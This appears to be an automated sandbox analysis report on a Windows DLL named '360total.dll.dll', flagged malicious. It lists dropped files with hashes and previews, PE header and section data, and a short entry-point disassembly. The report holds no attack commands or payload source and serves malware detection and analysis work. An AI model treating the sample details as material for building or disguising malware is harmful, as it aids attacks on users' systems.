                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.6.3.9.7.0.7.6.2.8.4.1.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.6.3.9.7.0.8.0.8.1.5.4.1.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.e.6.c.c.b.c.-.3.7.d.4.-.4.f.2.8.-.8.4.b.d.-.7.2.0.3.e.b.5.1.c.0.8.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.c.9.4.2.a.b.-.b.b.8.a.-.4.0.2.0.-.a.5.c.1.-.6.6.8.d.9.e.c.2.9.d.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.3.6.0.t.o.t.a.l...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.8.-.0.0.0.1.-.0.0.1.4.-.6.3.d.7.-.2.3.d.0.1.e.9.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 21:15:07 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):57608
                                                                                            Entropy (8bit):1.7330274216494976
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:kJANn2dcHowOMkTqi1cPtzKRdF+lqL3p9AUW0q73n:Qen2dcHoHNeikyFp3AUWT
                                                                                            MD5:E6D230C5825F694AAADD1EDC194682B4
                                                                                            SHA1:5F822F74118A6D9B6FCFC6E2841995841A7A3D7F
                                                                                            SHA-256:BE08DFCB6D29DCFE803B44188C151CBA9D92C7691D32D5C5F56F07FC7987AB7B
                                                                                            SHA-512:AFD9BE1C4695E5D8742CD5B2ED5E34E994F02B2232C59B939073B6054DD6046C67C89CC84B272185B3D9B0DE8C7B77BE636D621D47D0B9E7E6E6BECB1BEC9547
                                                                                            Malicious:false
                                                                                            Preview:MDMP..a..... .......[.,f.........................................-..........T.......8...........T.......................................................................................................................eJ......8.......Lw......................T.......8...Z.,f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):8778
                                                                                            Entropy (8bit):3.6972004405537473
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJJHt6YPDwurgmf73eTprw89bwbnTfqWjm:R6lXJZt6Y7wagmf73UwbTf76
                                                                                            MD5:AA1D867BCB817FA815FFF1D681374F55
                                                                                            SHA1:C9FCFF72C190EE2DDFF86506AE7514B15C5FBF71
                                                                                            SHA-256:257CAA1EBB69609B69EA8FB6F42AC9B21BC6CF4F3E4EE8BE5ED02B9B96E3A557
                                                                                            SHA-512:0EAFBC5B2EED1E372606A73369D7A4DB02FF4AF9C3052CC199A60CC15BCB46221D62B2A08D143C65532DF107C891ABCF7F5439E56E5C59A11F3DFE612F29ADB2
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.0.<./.P.i.
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4764
                                                                                            Entropy (8bit):4.4685900332540465
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zsDJg771I90oSWpW8VYVvYm8M4JCECyfF5/yq85moRHptSTSDd:uIjfdI7HW7VVJLcHpoODd
                                                                                            MD5:DB661257F28F8EB3BF2404CF0DBFFD6B
                                                                                            SHA1:E3E7DDBE03733AE94CA5315C180A9AC3A8EEA292
                                                                                            SHA-256:C601248586A5D1DA054E1AD6FF6DB0ECA5501AB386D893A29E20CE66ACB4B32D
                                                                                            SHA-512:F4833EE80EAF3DA1EBCC7F1CB7BB206C5B0D907973C9EF25735E3DC8B0B80D8EE31E1A0A6D4D75D424B834454ED931FB7C6255EB860D6437FB82E8683D847F20
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297377" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 14 streams, Fri Apr 26 21:15:29 2024, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):57552
                                                                                            Entropy (8bit):1.7255441923702202
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:OJ9Nn2w+w5OMkws/tTwhdF+a1k3p9FkOqROnp:unn2BNrkFZk3Fk4p
                                                                                            MD5:E917C605C46F5731EEAD07FEFFD87606
                                                                                            SHA1:60510B6AEEEBE6FAA98DA66020AF74AFAF67B213
                                                                                            SHA-256:F8530F1DA175A1FD2DA7053F2CF539808DA20F900B2B54A21F66E2FD2B4270E0
                                                                                            SHA-512:576B21BD53BE27BF1725B0549453A37AC1F2062146DEE1CBA0FBFD45B4ADD6C2BBC656DB8A55C1898830930F38A20529EEE6835AA1C80D83F994224FA710CD85
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):7010
                                                                                            Entropy (8bit):3.718491268797514
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:RSIU6o7wVetbxfsjh5qY8QPZQtOugaMQUC89b3Sn47oUf0Z1Ngm:R6l7wVeJJsjyY7BQCpDC89bCn4f0Z12m
                                                                                            MD5:5E70EFE54CC55B2D7406433157E8564F
                                                                                            SHA1:88F8D1F34ACB793E6C1063D90400CBED79B26792
                                                                                            SHA-256:0B1B0BF50BD4814240C10008C97EB5A12C6DB2D69AA4303053F162A5A604A6C3
                                                                                            SHA-512:BB7D2B39486EFEBC38DCD68D9785B55E43742D16CD8EC3DFC0E1CB86BB3ECD1286048E409BB3BAE385469208915F3283442927BB5C0B6449C9F96EF0BA185614
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6200</Pi
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4764
                                                                                            Entropy (8bit):4.467449387434158
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zswNJg771I90oSWpW8VYj8Ym8M4JCECy3FkAV2Syq85mohHptSTSDd:uIjfwnI7HW7VWZJBV2SwHpoODd
                                                                                            MD5:9F96ED8F649A993477E363C647C247BF
                                                                                            SHA1:E7B34EB0423D8D611514C4DCDB1259F55CD50806
                                                                                            SHA-256:B55515FDC340F45817C171C8022144F2554707617FCBD6A37CE8C018FB03D603
                                                                                            SHA-512:35104CE51DA7938972CA26897F53A06D09707B8A7A70F5F1484871731FF9DB269E0ADEC393779359AAF56151F8B5AFFA32115D71E0EED29B87C20366A89DD9E9
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="297378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                            Process:C:\Windows\System32\rundll32.exe
                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):906752
                                                                                            Entropy (8bit):6.271226161679794
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
                                                                                            MD5:BD3A3714EE9A071EBEB59AC91D9EBB5A
                                                                                            SHA1:55110A221F20A4CEEC34C58D0179FA31F8C102E9
                                                                                            SHA-256:4CF2B612939359977DF51A32D2F63E2CB0C6C601E114B8E4812BD548D1DB85FE
                                                                                            SHA-512:7244220F29057339C99A22C20268187BA6F6681251F4CE4F305AD22DC030F6078B4F298EF10AD392DC5D036C41C7B8C28C2BD997EA39EF7AB023CB9B5C946DC8
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: neo.msi, Detection: malicious
                                                                                            • Filename: neo.msi, Detection: malicious
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2677
                                                                                            Entropy (8bit):3.984740773534546
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8cdST++6HlidAKZdA19ehwiZUklqehSy+3:8Vv8Fy
                                                                                            MD5:F3A60D2CFE7A95B072ABB49ABD709CB1
                                                                                            SHA1:769412D4A4E4A6E32ED0F5B54BAF5352A6970A27
                                                                                            SHA-256:52847069A2D423F0775E43C9CF75860CC84255E224A5CE17DFDB618FAAEAAA4A
                                                                                            SHA-512:74299E49295BADE79039840A4DD05CA2A6C1D111ADD2D7E4C27DD78C37BCD29B3DCBFF7C81E14B180829523DC9FEB509628222B7A5EA89DA5C4D7748CF045B2E
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2679
                                                                                            Entropy (8bit):4.001318286394295
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:86GdST++6HlidAKZdA1weh/iZUkAQkqeh1y+2:8evO9QQy
                                                                                            MD5:F1B85C4C572F624137C2EF03CB184973
                                                                                            SHA1:86F97AFF78213587952F06FFDD2A6EE0B0D6C58C
                                                                                            SHA-256:1CFECDC50B348933D0F472F0FF02FC687A8BD29B5AB1193CAE1985FB06AC31B2
                                                                                            SHA-512:6D81F66DBE727960BD20E3569318814FD0E8B0715393D3A791AB86C42B5F600D18FF134E69235AACA23F387F7586CD71D5912FF83B78505417ED897366A4200A
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2693
                                                                                            Entropy (8bit):4.010296895695929
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8x/dST++sHlidAKZdA14tseh7sFiZUkmgqeh7sry+BX:8xUvwnxy
                                                                                            MD5:31AD1F73B9C3868B035546CD7B2EB898
                                                                                            SHA1:1017725C003B51E85C5E208C7B78261E41A88E56
                                                                                            SHA-256:910EC2DD46813CD1C5A879E3061BF4C5C4B11175614A659D0CD80A0FC242FA4B
                                                                                            SHA-512:30C3B7E0A8A1E4E5A86BCCACE5632DBA33C12C4B782626E48DC7696B198EC7FECCA1B65D87E67AB0CE8F15FFCBFA98BBB33C9F498965C8987FFBB6A321B7B92C
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):4.0008522650406135
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:856dST++6HlidAKZdA1vehDiZUkwqehJy+R:8lvVjy
                                                                                            MD5:48A56767D36A057FD2E1F8D924F8D7C7
                                                                                            SHA1:F9793ACE1FD6D6269445DCA1BA8B456B6869C2B1
                                                                                            SHA-256:80D5FC53ECC4A0D8AC5D83466CE4E80DDD0A7FF2F46D74C4E8426C3534827B05
                                                                                            SHA-512:E116879716E04707FD226F6B212108E5946D4EF29E88BF4B54CA11CE34C487EC7333783032C0415DFDBFFC456DD3D3697BC74DE3850F35EFA8E1731E0F4969E3
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:15 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2681
                                                                                            Entropy (8bit):3.9865671241481304
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:8edST++6HlidAKZdA1hehBiZUk1W1qehHy+C:8vvF9ny
                                                                                            MD5:4E7F89B23A0808F2C1A1DDE7E21CF157
                                                                                            SHA1:6C293E22E35740F231113387E10A5D11E848E863
                                                                                            SHA-256:934FC275B78C2EC7A1CA7022CBDA5DC897542823EA26E476A04A6C06B5C15008
                                                                                            SHA-512:17E2D0FD7DAAD2E2D1820EBF0EC931E370E3CDE37CE0A8BBB80B5B67F07D9C6280F1514973C39366ABD7336D368DA2ED2549065E45703DD4CE967B25F5B00EBC
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 20:15:14 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):2683
                                                                                            Entropy (8bit):4.000275288274835
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:85dST++6HlidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbxy+yT+:8mvZT/TbxWOvTbxy7T
                                                                                            MD5:7AAC7BDD4D6ED112F8C76D41554B88EB
                                                                                            SHA1:6B840AAAF026E47EA7DDE1EB6B31461833B4E7E4
                                                                                            SHA-256:C30732232EE0E2A77CDE149D52757F7717CF270AFCF44E1654BE35EEB2217F36
                                                                                            SHA-512:82D0BB033EB8F484834E121B4E5A8983F4DA099A06D1A256D4F338BC6DC49B9783C6E3BB1B212B968132AC0CFEF67D7F79B7C6DB9768E4E9B48914C72464B205
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                            Category:dropped
                                                                                            Size (bytes):1835008
                                                                                            Entropy (8bit):4.422404647548914
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:ZSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNa0uhiTw:QvloTMW+EZMM6DFy003w
                                                                                            MD5:27E8F530842D1D5DB91E0D8C42A927E8
                                                                                            SHA1:978FD117E2DBB29981F9348318DB84B2953F8BC7
                                                                                            SHA-256:5C93D7F04A8A225DC214D8A04E2949670D42AD9AE4E721E2CACFC5EEA7A77A83
                                                                                            SHA-512:D7A0B3DCAEABFA17599DC1C5FF2A9CED2B9A06FE957C2C580BA2246ADC872021E16909EED028187FC37F712E965216A5B15C35321E3C452D7948DE13F880B771
                                                                                            Malicious:false
                                                                                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                            Entropy (8bit):6.271226161679794
                                                                                            TrID:
                                                                                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                            • Win64 Executable (generic) (12005/4) 10.17%
                                                                                            • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                            • DOS Executable Generic (2002/1) 1.70%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                            File name:360total.dll.dll
                                                                                            File size:906'752 bytes
                                                                                            MD5:bd3a3714ee9a071ebeb59ac91d9ebb5a
                                                                                            SHA1:55110a221f20a4ceec34c58d0179fa31f8c102e9
                                                                                            SHA256:4cf2b612939359977df51a32d2f63e2cb0c6c601e114b8e4812bd548d1db85fe
                                                                                            SHA512:7244220f29057339c99a22c20268187ba6f6681251f4ce4f305ad22dc030f6078b4f298ef10ad392dc5d036c41c7b8c28c2bd997ea39ef7ab023cb9b5c946dc8
                                                                                            SSDEEP:12288:WfPSAAUHV4fZUv/TrguVTax7hNRu18VAyJFoxMk/wYeDKDMyPDi:MPSAAUHV4fZUvfgmaxpu1FyJ6xMYHMke
                                                                                            TLSH:84156B497FA88265C0A7C13AD5938A9AF3F274411F31D78F4161576E3F3B6B24B29322
                                                                                            File Content Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$........,>5.MPf.MPf.MPf.<Qg.MPf..Qg.MPf.%Tg.MPf.%Sg.MPf.&Ug.MPf-$Qg.MPf.<Ug.MPf.<Ug.MPf+..f.MPf/$Tg.MPf.*Ug.MPf.*Tg.MPf/$Ug.MPf.$Ug.MP
                                                                                            Icon Hash:7ae282899bbab082
                                                                                            Entrypoint:0x18006ff60
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:true
                                                                                            Imagebase:0x180000000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                            DLL Characteristics:HIGH_ENTROPY_VA
                                                                                            Time Stamp:0x60ED353A [Tue Jul 13 06:39:54 2021 UTC]
                                                                                            TLS Callbacks:0x800789b0, 0x1
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:2
                                                                                            File Version Major:5
                                                                                            File Version Minor:2
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:2
                                                                                            Import Hash:908746745c485828202e3664dddf55a1
                                                                                            Signature Valid:
                                                                                            Signature Issuer:
                                                                                            Signature Validation Error:
                                                                                            Error Number:
                                                                                            Not Before, Not After
                                                                                              Subject Chain
                                                                                                Version:
                                                                                                Thumbprint MD5:
                                                                                                Thumbprint SHA-1:
                                                                                                Thumbprint SHA-256:
                                                                                                Serial:
                                                                                                Instruction
                                                                                                dec eax
                                                                                                sub esp, 28h
                                                                                                dec edx
                                                                                                jne 00007F31E86EDAEEh
                                                                                                call 00007F31E86EDBBCh
                                                                                                dec eax
                                                                                                mov dword ptr [000A75C2h], eax
                                                                                                mov eax, 00000001h
                                                                                                dec eax
                                                                                                add esp, 28h
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                dec eax
                                                                                                mov eax, esp
                                                                                                dec eax
                                                                                                mov dword ptr [eax+10h], ebx
                                                                                                dec eax
                                                                                                mov dword ptr [eax+18h], ebp
                                                                                                push esi
                                                                                                push edi
                                                                                                inc ecx
                                                                                                push esi
                                                                                                dec eax
                                                                                                sub esp, 20h
                                                                                                dec esp
                                                                                                mov ecx, dword ptr [000A759Ch]
                                                                                                inc ebp
                                                                                                xor eax, eax
                                                                                                mov dword ptr [eax+08h], 62756373h
                                                                                                inc esp
                                                                                                mov byte ptr [eax+0Ch], al
                                                                                                dec ecx
                                                                                                arpl word ptr [ecx+3Ch], ax
                                                                                                inc edx
                                                                                                mov ecx, dword ptr [eax+ecx+00000088h]
                                                                                                test ecx, ecx
                                                                                                je 00007F31E86EDB55h
                                                                                                dec ecx
                                                                                                lea eax, dword ptr [ecx+ecx]
                                                                                                inc ebp
                                                                                                mov edx, eax
                                                                                                mov esi, dword ptr [eax+18h]
                                                                                                test esi, esi
                                                                                                jle 00007F31E86EDB47h
                                                                                                inc esp
                                                                                                mov ebx, dword ptr [eax+20h]
                                                                                                mov ebx, dword ptr [eax+24h]
                                                                                                inc esp
                                                                                                mov esi, dword ptr [eax+1Ch]
                                                                                                dec ebp
                                                                                                add ebx, ecx
                                                                                                dec ecx
                                                                                                add ebx, ecx
                                                                                                movzx eax, word ptr [ebx]
                                                                                                dec eax
                                                                                                lea edi, dword ptr [esp+40h]
                                                                                                dec ecx
                                                                                                lea ecx, dword ptr [esi+eax*4]
                                                                                                inc ecx
                                                                                                mov eax, dword ptr [ebx]
                                                                                                inc edx
                                                                                                mov ebp, dword ptr [ecx+ecx]
                                                                                                dec ecx
                                                                                                add eax, ecx
                                                                                                jmp 00007F31E86EDAECh
                                                                                                cmp cl, byte ptr [edi]
                                                                                                jne 00007F31E86EDAEEh
                                                                                                dec eax
                                                                                                inc eax
                                                                                                dec eax
                                                                                                inc edi
                                                                                                mov cl, byte ptr [eax]
                                                                                                test cl, cl
                                                                                                jne 00007F31E86EDAD2h
                                                                                                mov cl, byte ptr [eax]
                                                                                                inc ecx
                                                                                                mov edx, eax
                                                                                                inc ecx
                                                                                                mov eax, eax
                                                                                                cmp cl, byte ptr [edi]
                                                                                                setnbe dl
                                                                                                cmp byte ptr [edi], cl
                                                                                                setnbe al
                                                                                                cmp edx, eax
                                                                                                je 00007F31E86EDAF4h
                                                                                                inc ecx
                                                                                                inc edx
                                                                                                dec eax
                                                                                                add ebx, 02h
                                                                                                dec ecx
                                                                                                add ebx, 04h
                                                                                                inc esp
                                                                                                cmp edx, esi
                                                                                                jl 00007F31E86EDA94h
                                                                                                jmp 00007F31E86EDAE6h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc2be0 | 0x80 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2c60 | 0x12c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x173000 | 0x29d | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x16c000 | 0x6498 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcea98 | 0x3f48 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x174000 | 0xff0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9d5b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x9d710 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9d610 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x86000 | 0xab8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x84928 | 0x84a00 | 7cecfc7f755d10f37d8019ee83d7913e | False | 0.47230649151743637 | data | 6.388288012775588 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x86000 | 0x3edf6 | 0x3ee00 | 63cfc64e6b66f4b5f42495585448342f | False | 0.33804982604373757 | Sony PlayStation Audio | 4.482248982092484 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc5000 | 0xa6518 | 0x3000 | ff509d42bac4371303af1aa4cca9be90 | False | 0.23234049479166666 | SysEx File - | 4.608801437987786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x16c000 | 0x6498 | 0x6600 | d7c0afebce54eaf77c27bc124f1f0d5d | False | 0.5049402573529411 | data | 5.912256571930567 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x173000 | 0x29d | 0x400 | 3d1e3133eddf2d7b64237cb5d873ee5d | False | 0.298828125 | data | 3.495284342232033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x174000 | 0xff0 | 0x1000 | 6f76baeca3addf9f1f068a1e0392fd3e | False | 0.360595703125 | data | 5.417278568480602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
